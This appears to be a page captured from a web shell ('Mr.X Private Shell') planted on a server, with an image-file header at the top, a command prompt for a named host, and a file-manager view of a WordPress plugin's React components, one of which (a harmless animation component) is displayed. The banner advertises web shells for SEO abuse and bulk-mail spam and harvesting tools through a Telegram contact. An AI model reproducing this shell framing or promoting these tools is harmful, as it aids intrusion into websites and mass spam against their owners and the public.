����JFIF��������� Mr.X
  
  __  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

fistvdlb@216.73.217.65: ~ $
import { useMemo } from '@wordpress/element';
import { colord } from 'colord';
import { motion, useReducedMotion } from 'framer-motion';

export const ViewportPulse = () => {
	const shouldReduceMotion = useReducedMotion();
	const bannerMain = useMemo(() => {
		return getComputedStyle(document.documentElement)
			.getPropertyValue('--ext-banner-main')
			.trim();
	}, []);

	const bannerMainWashed = useMemo(() => {
		return colord(bannerMain)
			.desaturate(0.3)
			.lighten(0.4)
			.alpha(0.2)
			.toRgbString();
	}, [bannerMain]);

	const isLight = useMemo(() => colord(bannerMain).isLight(), [bannerMain]);

	const designMain = useMemo(() => {
		return getComputedStyle(document.documentElement)
			.getPropertyValue('--ext-design-main')
			.trim();
	}, []);

	const mainColorLike = useMemo(() => {
		return colord(designMain).desaturate(0.3).alpha(0.2).toRgbString();
	}, [designMain]);

	if (shouldReduceMotion) return null;

	const colorToUse = isLight ? mainColorLike : bannerMainWashed;
	return (
		<motion.div
			className="absolute inset-0"
			style={{
				background: `radial-gradient(ellipse at center, transparent 70%, ${colorToUse} 100%)`,
			}}
			animate={{ opacity: [0, 1, 0] }}
			transition={{
				duration: 2.5,
				repeatDelay: 4,
				repeat: Infinity,
				ease: 'linear',
			}}
		/>
	);
};

Filemanager

Name Type Size Permission Actions
ChoiceBox.jsx File 1.64 KB 0644
CreatingSite.jsx File 4.45 KB 0644
DescriptionGathering.jsx File 10.88 KB 0644
ExtendifyCodeConnector.jsx File 2.71 KB 0644
Launch.jsx File 833 B 0644
Logo.jsx File 552 B 0644
MigrateChoice.jsx File 1.53 KB 0644
MovingGradients.jsx File 1.73 KB 0644
NeedsTheme.jsx File 846 B 0644
RestartLaunchModal.jsx File 5.17 KB 0644
ViewportPulse.jsx File 1.28 KB 0644